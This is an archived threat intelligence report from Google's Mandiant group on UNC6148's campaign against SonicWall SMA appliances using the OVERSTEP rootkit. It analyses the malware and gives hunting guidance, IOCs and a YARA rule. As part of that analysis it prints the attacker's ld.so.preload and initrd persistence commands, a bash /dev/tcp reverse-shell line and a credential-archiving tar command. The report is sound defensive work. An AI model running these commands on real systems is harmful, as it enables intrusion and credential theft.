{ "id": "41118bc2-fc91-45a0-80c0-ac5dbd5bcc5f", "created_at": "2026-04-06T00:11:48.911674Z", "updated_at": "2026-04-10T03:36:48.515968Z", "deleted_at": null, "sha1_hash": "59eb6f4ecb8f7286007dcb57343a470435ee997b", "title": "Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 153453, "plain_text": "Ongoing SonicWall Secure Mobile Access (SMA) Exploitation\r\nCampaign using the OVERSTEP Backdoor\r\nBy Mandiant, Google Threat Intelligence Group\r\nPublished: 2025-07-16 · Archived: 2026-04-05 16:34:02 UTC\r\nWritten by: Josh Goddard, Zander Work, Dimiter Andonov\r\nUPDATE (Sep 16): Clarified hunting guidance specifics surrounding ld.so.preload files.\r\nUPDATE (July 30): Added additional network IOC identified by Sonicwall as being associated with\r\nOVERSTEP. \r\nIntroduction\r\nGoogle Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access\r\n(SMA) 100 series appliances. GTIG assesses with high confidence that UNC6148 is leveraging credentials and\r\none-time password (OTP) seeds stolen during previous intrusions, allowing them to regain access even after\r\norganizations have applied security updates. Evidence for the initial infection vector was limited, as the actor's\r\nmalware is designed to selectively remove log entries, hindering forensic investigation; however, it is likely this\r\nwas through the exploitation of known vulnerabilities.\r\nIn this new wave of activity, the actor has deployed a previously unknown persistent backdoor/user-mode rootkit,\r\nwhich GTIG tracks as OVERSTEP. Based on findings from Mandiant Incident Response engagements, our\r\nanalysis shows this malware modifies the appliance's boot process to maintain persistent access, steal sensitive\r\ncredentials, and conceal its own components. GTIG assesses with moderate confidence that UNC6148 may have\r\nused an unknown zero-day remote code execution vulnerability to deploy OVERSTEP on opportunistically\r\ntargeted SonicWall SMA appliances.\r\nGTIG assesses with moderate confidence that UNC6148's operations, dating back to at least October 2024, may\r\nbe to enable data theft and extortion operations, and possibly ransomware deployment. An organization targeted\r\nby UNC6148 in May 2025 was posted to the \"World Leaks\" data leak site (DLS) in June 2025, and UNC6148\r\nactivity overlaps with publicly reported SonicWall exploitation from late 2023 and early 2024 that has been\r\npublicly linked to the deployment of Abyss-branded ransomware (tracked by GTIG as VSOCIETY).\r\nGiven the risk of recompromise using previously stolen credentials, organizations should follow the\r\nrecommendations within this post to hunt for potential compromises and rotate all credentials, even if their\r\nappliances are fully patched. This blog post provides technical details on the OVERSTEP rootkit and the\r\nUNC6148 campaign to aid defenders in mitigating this threat.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 1 of 11\n\nInitial SMA Exploitation to Gain Administrator Credentials\r\nMandiant's first observations of UNC6148 in a recent investigation showed that they already had local\r\nadministrator credentials to the targeted SMA 100 series appliance, and neither forensic evidence nor other data\r\nwas identified to show how those credentials were obtained. GTIG assesses with high confidence that UNC6148\r\nexploited a known vulnerability to steal administrator credentials prior to the targeted SMA appliance being\r\nupdated to the latest firmware version ( 10.2.1.15-81sv ), based on the patching timeline and public reporting of\r\nSonicWall n-day exploitation activity throughout 2025. Analysis of network traffic metadata records suggests that\r\nUNC6148 may have initially exfiltrated these credentials from the SMA appliance as early as January 2025.\r\nPublic reporting from SonicWall and multiple security firms has highlighted several different vulnerabilities that\r\ncould possibly have been exploited by UNC6148:\r\nCVE-2021-20038: Unauthenticated remote code execution (SonicWall advisory, Truesec report,\r\nAttackerKB entry)\r\nThis is a memory corruption vulnerability that can be executed to gain code execution; however,\r\nRapid7's public exploit can make up to 200,000 HTTP requests and could take over an hour to\r\nexecute, suggesting a widespread campaign may not take advantage of this vulnerability.\r\nTruesec identified this as a plausible entrypoint for intrusion activity they observed in late 2023\r\ntargeting a SonicWall SMA.\r\nCVE-2024-38475: Unauthenticated path traversal vulnerability in Apache HTTP Server, which affected the\r\nSMA 100 series (SonicWall advisory, Orange CyberDefense/SCRT blog post)\r\nThis can be exploited on the SMA 100 series specifically to exfiltrate two different SQLite\r\ndatabases, temp.db and persist.db , which store sensitive information including user account\r\ncredentials, session tokens, and OTP seed values.\r\nwatchTowr published a blog post in May 2025 describing how this vulnerability can be chained\r\nwith another bug, CVE-2023-44221, to compromise an SMA 100 series appliance; however, we did\r\nnot identify any evidence suggesting this bug chain was used by UNC6148.\r\nCVE-2021-20035: Authenticated remote code execution vulnerability (SonicWall advisory, ArcticWolf\r\nreport)\r\nThis is a command injection vulnerability in the handler for /cgi-bin/sitecustomization POST\r\nrequests.\r\nArctic Wolf and SonicWall reported on this vulnerability being exploited in the wild in April 2025.\r\nCVE-2021-20039: Authenticated remote code execution vulnerability (SonicWall advisory, dfir.ch blog\r\npost, AttackerKB entry)\r\nThis is a command injection vulnerability in the request handler for /cgi-bin/viewcert .\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 2 of 11\n\ndfir.ch reported this vulnerability being used to exploit SonicWall SMAs in an intrusion that led to\r\nthe deployment of Abyss-branded ransomware in March 2024, with similar intrusion artifacts to\r\nMandiant's investigation.\r\nCVE-2025-32819: Authenticated file deletion vulnerability (SonicWall advisory, Rapid7 report)\r\nUsing a crafted HTTP request, this vulnerability can be exploited to cause a targeted SonicWall\r\nSMA to revert the built-in administrator credentials to password , granting the attacker\r\nadministrator access.\r\nThere are several different paths UNC6148 could have taken with the aforementioned vulnerabilities, or possibly a\r\ndifferent vulnerability not mentioned here. CVE-2024-38475 would have provided local administrator credentials\r\nand valid session tokens that UNC6148 could reuse, making it an attractive target, but Mandiant was not able to\r\nconfirm abuse of that vulnerability. Exploitation of the previously mentioned authenticated bugs would require\r\nUNC6148 to already have some level of credentials to the SMA appliance, making them less likely to have been\r\nabused, but still worth mentioning due to their in-the-wild exploited status. It is also possible that credentials could\r\nhave been obtained through infostealer logs or credential marketplaces, but GTIG was unable to identify any\r\ndirect credential exposure related to the abused SMA appliance credentials.\r\nSubsequent SMA Compromise and OVERSTEP Deployment\r\nMandiant's aforementioned investigation showed that in June 2025, UNC6148 established a Secure Sockets Layer\r\nvirtual private network (SSL VPN) session on the targeted SMA 100 series appliance using the mentioned local\r\nadministrator credentials from a BitLaunch (BLNWX) VPS (193.149.180.50). \r\nOnce the SSL VPN session was established, the attacker spawned a reverse shell on the targeted SMA appliance.\r\nShell access should not be possible by design on these appliances, and Mandiant's joint investigation with the\r\nSonicWall Product Security Incident Response Team (PSIRT) did not identify how UNC6148 established this\r\nreverse shell. It's possible the reverse shell was established via exploitation of an unknown vulnerability by\r\nUNC6148.\r\nThrough the reverse shell, UNC6148 performed initial reconnaissance and file manipulation using a variety of\r\nbuilt-in system binaries such as cat , chmod , cp , date , hostname , mkdir , mount , mv , and rm .\r\nMandiant also observed the actor export and import settings to the SMA appliance, along with new network\r\naccess control policy rules created for IP addresses used by UNC6148, suggesting they may have modified an\r\nexported settings file offline to include new rules for their infrastructure to ensure uninterrupted operations.\r\nFollowing this initial activity, the attacker deployed the OVERSTEP backdoor. This process involved executing a\r\nseries of commands to decode the binary from Base64 into the persistent /cf directory with the filename\r\nxxx.elf , moving it to /usr/lib/libsamba-errors.so.6 , and ensuring persistence by adding its path to\r\n/etc/ld.so.preload .\r\ncd /cf; touch xxx.elf;\r\nopenssl enc -base64 -d [REDACTED] \u003e\u003exxx.elf;\r\nchmod 777 /usr/lib/libsamba-errors.so.6;\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 3 of 11\n\ntouch -c /usr/lib/libsamba-errors.so.6 -r\r\necho /usr/lib/libsamba-errors.so.6 \u003e /etc/ld.so.preload;\r\nchown root:root /usr/lib/libsamba-errors.so.6;\r\nchmod 777 /usr/lib/libsamba-errors.so.6;\r\ntouch -c /usr/lib/libsamba-errors.so.6 -r\r\necho /usr/lib/libsamba-errors.so.6 \u003e /etc/ld.so.preload;\r\narp\r\nFigure 1: Selection of attacker shell commands executed on the appliance\r\nNext, UNC6148 modified the legitimate RC file /etc/rc.d/rc.fwboot to achieve persistence for OVERSTEP.\r\nThe changes meant that whenever the appliance was rebooted, the OVERSTEP binary would be loaded into the\r\nrunning filesystem on the appliance. Specifically, the bootCurrentFirmware function in the rc.fwboot script\r\nwas modified to include code that performed the following:\r\nCreated a temporary directory named zzz within the present firmware directory. This directory served as\r\na staging area to unpack, modify, and repack the INITRD image. It was a preparatory step for injecting\r\nmalicious content without directly overwriting critical system files during runtime.\r\nDecompressed the INITRD.GZ file, which was the compressed initial RAM disk image. The decompressed\r\nfile was named INITRD , which contains the minimal root filesystem that is loaded into memory during the\r\nboot process before the actual root filesystem is mounted. Modifying this image allowed the attacker to\r\ninject malicious files that will be present and executable early in the boot sequence, making it difficult to\r\ndetect and remove.\r\nMounted the decompressed INITRD file as a loop device to the newly created $fwLoc/zzz directory. This\r\nmade the contents of the INITRD file accessible and modifiable as if it were a regular filesystem. This was\r\nan important step that allowed the script to browse and modify the contents of the initial RAM disk.\r\nCopied the file libsamba-errors.so.6 from /cf/ into the mounted INITRD directory /usr/lib/ .\r\nChanged the owner and group of the file libsamba-errors.so.6 to root:root . This sets the permissions\r\nto mimic legitimate system libraries, which are typically owned by root .\r\nChanged the file permissions of the copied malicious library to 0777 (read, write, and execute for owner,\r\ngroup, and others).\r\nEmployed a timestomping technique, attempting to copy the modification timestamp from the legitimate\r\nfile libsamba-errors.so to the malicious file libsamba-errors.so.6 . The goal was to make the\r\nmalicious file appear as if it were part of the original system installation, thereby hindering detection and\r\ninvestigation.\r\nWrote the path to the malicious file /usr/lib/libsamba-errors.so.6 into the ld.so.preload file\r\nlocated within the INITRD directory /etc/ . This causes dynamic executables to load the OVERSTEP\r\nshared object file, providing persistence and privileged execution in system processes.\r\nCleaned up temporary modifications, including:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 4 of 11\n\nFlushing pending disk writes to ensure all changes to the INITRD file were saved\r\nUnmounting the INITRD file from the temporary directory\r\nRecompressing the modified INITRD file\r\nRemoving the temporary directory\r\nRenamed the newly compressed INITRD to INITRD.GZ , matching the expected filename.\r\nChanged the timestamps of the modified INITRD.GZ file to match those of the kernel image file,\r\nBZIMAGE . This was another timestomping operation to hinder detection and investigation. \r\nLoaded the kernel image BZIMAGE and the modified initial RAM disk, INITRD.GZ , into memory for a\r\nnew kernel execution. It also appended kernel boot options from LINUX.OPT . This prepared the system to\r\nboot into the modified firmware. The use of kexec allowed the running Linux kernel to boot another\r\nLinux kernel without a full hardware reboot.\r\nExecuted the newly loaded kernel by initiating a soft reboot.\r\nIn summary, the code took advantage of the system's boot process to inject a persistent rootkit. By modifying the\r\nINITRD file and leveraging ld.so.preload , the attacker ensured their malicious code would be loaded and\r\nexecuted every time any dynamic executable starts, providing them with privileged and persistence control of the\r\nappliance.\r\nfunction bootCurrentFirmware()\r\n{\r\necho \"$FUNCNAME: begin\" \u003e\u003e $LOGFILE\r\nfwLoc=/cf/firmware/current\r\n \r\nif [ ! -f $fwLoc/BZIMAGE ]; then\r\n echo \"Can't locate the kernel image\" \u003e\u003e $LOGFILE;\r\nelif [ -f $fwLoc/INITRD ]; then\r\n echo \"Can't locate the filesystem image\" \u003e\u003e $LOGFILE;\r\nelse\r\n mkdir $fwLoc/zzz\r\n gzip -d $fwLoc/INITRD.GZ\r\n mount -o loop $fwLoc/INITRD $fwLoc/zzz\r\n \r\n cp /cf/libsamba-errors.so.6\r\n$fwLoc/zzz/usr/lib/libsamba-errors.so.6\r\n chown root:root $fwLoc/zzz/usr/lib/libsamba-errors.so.6\r\n chmod 777 $fwLoc/zzz/usr/lib/libsamba-errors.so.6\r\n touch -c $fwLoc/zzz/usr/lib/libsamba-errors.so.6 -r\r\n$fwLoc/zzz/usr/lib/libsamba-errors.so\r\n echo /usr/lib/libsamba-errors.so.6 \u003e $fwLoc/zzz/etc/ld.so.preload\r\n \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 5 of 11\n\nsync; umount $fwLoc/zzz; sync; gzip $fwLoc/INITRD; rm -rf $fwLoc/zzz\r\n mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ; touch -c $fwLoc/INITRD.GZ -r\r\n$fwLoc/BZIMAGE\r\n \r\n /usr/local/sbin/kexec -l $fwLoc/BZIMAGE --initrd=$fwLoc/INITRD.GZ\r\n--append=\"`cat $fwLoc/LINUX.OPT`\"\r\n /usr/local/sbin/kexec -e;\r\nfi\r\n \r\necho \"$FUNCNAME: end\" \u003e\u003e $LOGFILE\r\n}\r\nFigure 2: Modified function in the rc.fwboot file to provide persistence for OVERSTEP\r\nOnce the deployment of OVERSTEP was complete, the threat actor cleared the system logs and rebooted the\r\nappliance to trigger the execution of OVERSTEP.\r\nAnalysis of OVERSTEP\r\nOVERSTEP is a backdoor written in C, designed for SonicWall SMA 100 series appliances; observed samples\r\nhave been compiled as a 32-bit ELF shared object for the Intel x86 architecture. This shared object is designed to\r\nbe loaded into processes via the /etc/ld.so.preload file. When preloaded in this manner, the malicious library\r\nis mapped into the address space of subsequently launched processes. This preloading enables the malware to\r\nhijack standard library functions—specifically open , open64 , readdir , readdir64 , and write —by\r\nensuring these symbols are resolved from the malicious shared object before the legitimate system libraries. The\r\nbackdoor's primary functionalities are to establish a reverse shell and exfiltrate passwords from the compromised\r\nhost. Additionally, the malware implements usermode rootkit capabilities by leveraging its hooked file system-related functions ( open , open64 , readdir , readdir64 ) to effectively hide its components on the host.\r\nCommunications with the command-and-control (C2 or C\u0026C) server are indirect, relying on parsing commands\r\nfrom buffers intercepted by the malicious write API.\r\nThe path to the malicious shared object was added to the /etc/ld.so.preload file, which effectively ensures the\r\nmalware will persist on the compromised appliance. Due to its inclusion in the /etc/ld.so.preload file, the\r\nmalware's shared object is mapped into every new process executed on the compromised system. Upon being\r\nmapped, the malware gains execution through its initialization routine, specifically via its exported my_init\r\nfunction. This my_init function then sets the FS_IMMUTABLE_FL flag on /etc/ld.so.preload , effectively\r\npreventing its modification, deletion, renaming, or the creation of links to it. This preloading mechanism enables\r\nthe malware to perform LD_PRELOAD hijacking, interposing its own versions of the following standard library\r\nfunctions: open , open64 , readdir , readdir64 , and write . The hijacked open* and readdir * APIs are\r\nleveraged to implement a usermode rootkit, concealing the malware's presence and components. The core\r\nbackdoor functionality, conversely, is implemented within the hooked write function. The rootkit and backdoor\r\nfunctionalities are described in greater detail in the subsequent sections.\r\nUsermode Rootkit\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 6 of 11\n\nThe hijacked open and open64 API functions, which typically specify a file path and access mode, are\r\nmanipulated by the malware. The malware's implementation of these functions checks if the requested file path is\r\n/etc/ld.so.preload . If a match occurs, it returns an error code, thereby preventing any process on the\r\ncompromised system from opening this critical file.\r\nThe hijacked readdir and readdir64 API functions are used to conceal the following artifacts from directory\r\nlistings:\r\n/proc entries related to bash , sh , or ssh  \r\nlibsamba-errors.so.6 (the filename of the malware observed on this particular system) \r\n/etc/ld.so.preload\r\nBackdoor\r\nThe backdoor's command execution mechanism is centered on its hijacked write API function. The standard\r\nwrite API receives a buffer containing data destined for an I/O stream. In this implementation, the malicious\r\nwrite function examines the first 1024 bytes of this buffer, searching for the command strings dobackshell or\r\ndopasswords . If either string is detected, the malware expects to find associated command parameters\r\nimmediately following it.\r\ndobackshell\r\nStarts a reverse shell using the command bash -i \u003e\u0026 /dev/tcp/\u003cip\u003e/\u003cport\u003e 0\u003e\u00261 \u0026 .\r\nParameters: IP address and port.\r\ndopasswords\r\nCreates a TAR archive with the provided \u003cfilename\u003e, bundling sensitive files using the command in\r\nFigure 3. Notably, the TAR archive is saved in the web-accessible directory\r\n/usr/src/EasyAccess/www/htdocs with permissive 777 permissions. This allows an attacker to\r\ndownload the archive via a web browser.\r\nParameters: Filename of the TAR archive.\r\ntar czfP /usr/src/EasyAccess/www/htdocs/\u003cfilename\u003e.tgz\r\n/tmp/temp.db /etc/EasyAccess/var/conf/persist.db\r\n/etc/EasyAccess/var/cert; chmod 777\r\n/usr/src/EasyAccess/www/htdocs/\u003cfilename\u003e.tgz\r\nFigure 3: Shell commands executed by the dopasswords OVERSTEP command\r\nFollowing the parsing and execution of a command, the malware attempts to remove corresponding entries from\r\naffected log files. This cleanup is performed using the sed command: sed -i '/\u003ccmd\u003e/d'\r\n/var/log/\u003clog_file\u003e , where \u003ccmd\u003e is either dobackshell or dopasswords . The targeted \u003clog_file\u003e can be\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 7 of 11\n\nhttpd.log , http_request.log , or inotify.log . This log cleaning process is only initiated if the malware can\r\nsuccessfully elevate its privileges by setting its UID and GID to 0 .\r\nReceiving Commands\r\nThe malware was designed to receive commands embedded within web requests. For instance, a legitimate\r\nhttpd server might receive a URL (e.g., https://\u003ccompromised_server\u003e/query?q=dobackshell\u003cparams\u003e )\r\ncontaining the command and its parameters. The server would then attempt to log this request to files such as\r\nhttpd.log , http_request.log , or inotify.log . At this juncture, because the malicious shared object is\r\npreloaded into the httpd process's address space, the call to write is intercepted. The malicious write\r\nfunction then parses the log data and dispatches any recognized command. While, technically, write operations\r\nfrom any process could be used to deliver commands, this web server log vector is likely the intended and most\r\npractical method from an attacker's perspective.\r\nRisk and Post-Compromise Activities\r\nIn our investigations, GTIG observed beaconing traffic from compromised appliances, but we did not identify\r\nnotable post-compromise activities. The actor's success in hiding their tracks is largely due to OVERSTEP's\r\ncapability to selectively delete log entries from httpd.log , http_request.log , and inotify.log . This anti-forensic measure, combined with a lack of shell history on disk, significantly reduces visibility into the actor's\r\nsecondary objectives.\r\nThe primary risk stems from OVERSTEP's functionality to steal sensitive files. Its ability to exfiltrate the\r\npersist.db database and certificate files from the /etc/EasyAccess/var/cert directory gives the attacker\r\ncredentials, OTP seeds, and certificates. While we did not directly observe the weaponization of this stolen data, it\r\ncreates a clear path for persistent access.\r\nImpacted organizations should rotate all secrets stored on the appliances and follow the recommendations in this\r\narticle.\r\nWider Context and Campaigns\r\nThis campaign extends beyond the incidents GTIG directly investigated. We have identified targeting of other\r\nSonicWall SMA appliances by UNC6148, including possible scanning activity dating back to at least October\r\n2024. Our findings are also supported by SonicWall, which has confirmed reports of other impacted organizations\r\nand subsequently updated its advisory for CVE-2024-38475 to recommend OTP seed rotation.\r\nWhile GTIG has not directly observed monetization or other end-stage goals associated with this campaign,\r\nanalysis of historical network telemetry data revealed traffic involving an SMA 100 series appliance in May 2025\r\naffiliated with an organization that later appeared on the \"World Leaks\" DLS in June 2025; however, we cannot\r\nrule out coincidental overlap at this time.\r\nAdditionally, UNC6148 activity has noteworthy overlaps with historical analysis from Truesec and dfir.ch, which\r\ninvolved the deployment of Abyss-branded ransomware. These overlaps, which suggest that UNC6148 is the same\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 8 of 11\n\nactor or a related one, further indicate that these intrusions could ultimately lead to data extortion and ransomware\r\ndeployment.\r\nThe OVERSTEP backdoor and deployment mechanism observed by Mandiant appears to be a direct\r\nevolution of the wafxSummary tool reported by Truesec in late 2023.\r\nA dfir.ch blog post from early 2024 describes an intrusion where nearly a year went by between the\r\ndeployment of the wafxSummary tool Truesec wrote about, and the deployment of Abyss-branded\r\nransomware. This is consistent with the 6-month+ time gap between initial UNC6148 activity and the\r\ndeployment of OVERSTEP in our recent investigation.\r\nRecommendations\r\nGTIG recommends that all organizations with SMA appliances perform analysis to determine if they have been\r\ncompromised. Organizations should acquire disk images for forensic analysis to avoid interference from the\r\nrootkit anti-forensic capabilities. Organizations may need to engage with SonicWall to capture disk images from\r\nphysical appliances.\r\nHunting and Detection\r\nDefenders should analyze disk images and peripheral log sources for the following signs of compromise:\r\nFile System Artifacts\r\nPresence of any indicators of compromise (IOCs) listed in this report.\r\nUnexpected binaries within the persistent /cf directory or within INITRD files, especially in the\r\n/usr/lib directory. In our investigations, GTIG observed OVERSTEP residing in these\r\ndirectories.\r\nPresence of the file /etc/ld.so.preload on a disk image with greater than 2 bytes of contents.\r\nThis file should not exist with actual contents on a standard SMA appliance, and the rootkit will\r\nhide it from a live system.\r\nMalicious modifications to RC scripts, most notably the /etc/rc.d/rc.fwboot script.\r\nFiles with irregular timestamps within the INITRD image ( /cf/firmware/ ).\r\nLog and Network Analysis\r\nWeb requests to the appliance containing dobackshell or dopasswords in the URL query.\r\nAppliance event logs showing VPN sessions from external IP addresses (especially from low-reputation networks like BLNWX) using administrator accounts.\r\nOutbound HTTP network traffic from the appliance to external IP addresses.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 9 of 11\n\nLog entries for Current settings exported , Current settings imported , or Clear all logs\r\nmanually occurring outside of scheduled maintenance windows.\r\nIrregular activity or threats within other log files from the appliances, including from inside the\r\nFLASH.DAT files ( current and backup ).\r\nEvidence of lateral movement, primarily over Secure Shell (SSH), from the SMA appliance to other\r\nsystems in the environment.\r\nContainment and Eradication\r\nIf evidence of compromise is detected, organizations should take immediate steps to contain the threat.\r\nIsolate the affected appliance from the network to prevent further malicious activity.\r\nPreserve disk images and telemetry for a full forensic investigation.\r\nBecause the full extent of an actor's activity can be difficult to determine, GTIG recommends engaging\r\nMandiant Incident Response for a thorough investigation to ensure complete scoping and eradication.\r\nHardening and Mitigation\r\nTo mitigate the immediate threat and harden appliances against future attacks, organizations should:\r\nReset all credentials, including passwords and OTP bindings for all local and directory users on the\r\nappliance. This is the most critical step to invalidate secrets stolen in previous compromises.\r\nRevoke and reissue any certificates with private keys stored on the appliance.\r\nIndicators of Compromise (IOCs)\r\nHost-Based IOCs\r\nPath(s) SHA256 Hash Description\r\n/cf/xxx.elf/cf/libsamba-errors.so.6/usr/lib/libsamba-errors.so.6b28d57269fe4cd90d1650bde5e905611\r\n6de26d211966262e59359d0e2a67d473\r\nOVERSTEP\r\n/etc/rc.d/rc.fwboot\r\nf0e0db06ca665907770e2202957d3ecc\r\nd5a070acac1debaf0889d0d48c10e149\r\nModified legitimate\r\nboot RC file\r\nNetwork-Based IOCs\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 10 of 11\n\nIndicator Description\r\n193.149.180.50\r\nSource of VPN sessions where compromise occurred (used by UNC6148 between at least\r\nMay 2025 and June 2025)\r\n64.52.80.80 Reverse shell IP (used by UNC6148 between at least February 2025 and June 2025)\r\n193.149.176.230 Identified by SonicWall as triggering the OVERSTEP backdoor in July 2025\r\nDetections\r\nYARA Rule\r\nrule G_Backdoor_OVERSTEP_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group\"\r\ndate_created = \"2025-06-03\"\r\ndate_modified = \"2025-06-03\"\r\nrev = 1\r\nstrings:\r\n$s1 = \"dobackshell\"\r\n$s2 = \"dopasswords\"\r\n$s3 = \"bash -i \u003e\u0026 /dev/tcp/%s 0\u003e\u00261 \u0026\"\r\n$s4 = \"tar czfP /usr/src/EasyAccess/www/htdocs/%s.tgz\r\n/tmp/temp.db /etc/EasyAccess/var/conf/persist.db\r\n/etc/EasyAccess/var/cert; chmod 777\"\r\n$s5 = \"/etc/ld.so.preload\"\r\n$s6 = \"libsamba-errors.so.6\"\r\ncondition:\r\nuint32(0) == 0x464c457f and filesize \u003c 2MB and 4 of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/" ], "report_names": [ "sonicwall-secure-mobile-access-exploitation-overstep-backdoor" ], "threat_actors": [ { "id": "eb01bdec-5c18-4479-b343-cf58076dacf1", "created_at": "2024-08-10T02:02:56.273673Z", "updated_at": "2026-04-10T02:00:03.773129Z", "deleted_at": null, "main_name": "GOLD CRESCENT", "aliases": [ "Hunters International", "World Leaks" ], "source_name": "Secureworks:GOLD CRESCENT", "tools": [ "Hunters International", "SharpRhino" ], "source_id": "Secureworks", "reports": null }, { "id": "95e3a0a8-f981-4abc-a2ff-7cdaa31aee6e", "created_at": "2026-01-20T02:00:03.66064Z", "updated_at": "2026-04-10T02:00:03.912119Z", "deleted_at": null, "main_name": "UNC6148", "aliases": [], "source_name": "MISPGALAXY:UNC6148", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434308, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/59eb6f4ecb8f7286007dcb57343a470435ee997b.pdf", "text": "https://archive.orkl.eu/59eb6f4ecb8f7286007dcb57343a470435ee997b.txt", "img": "https://archive.orkl.eu/59eb6f4ecb8f7286007dcb57343a470435ee997b.jpg" } }